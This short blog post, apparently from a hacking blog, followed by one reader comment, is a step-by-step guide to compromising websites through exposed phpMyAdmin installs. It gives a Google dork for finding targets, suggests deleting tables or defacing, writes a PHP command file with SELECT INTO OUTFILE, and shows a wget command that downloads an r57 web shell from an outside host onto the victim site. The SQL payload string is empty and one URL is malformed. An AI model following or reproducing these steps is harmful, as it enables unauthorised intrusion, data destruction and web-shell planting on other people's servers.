STEPS:
1) Enter the following Dork in Google.
allinurl:index.php?db=information_schema
2) It will show you about 80,800 Results. So now you can guess how many Vuln sites are there :D..Open any site you will redirect to PHPmyAdmin
This dork bypasses the admin username and pass and takes You directly to information schema tables to get data and You can delete data or DEFACE
3) Now click 'Show MySQL system varible" then 'SQL' . Now you can run sql commands,like create db, delete tables or whatever. We want to upload shell so lets move on to it.
4) Now we will create a cmd line into a new file,with select into. SELECT "" INTO OUTFILE "full/path/here/cmd.php" and click 'Go'.
5) Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell. wget http://www.r57.biz /r57.txt;mv r57.txt shell.php. Thats all then we have the shell on the site!
Thanks 4 visiting our Blog!
How do I create the CMD file to upload?
ReplyDelete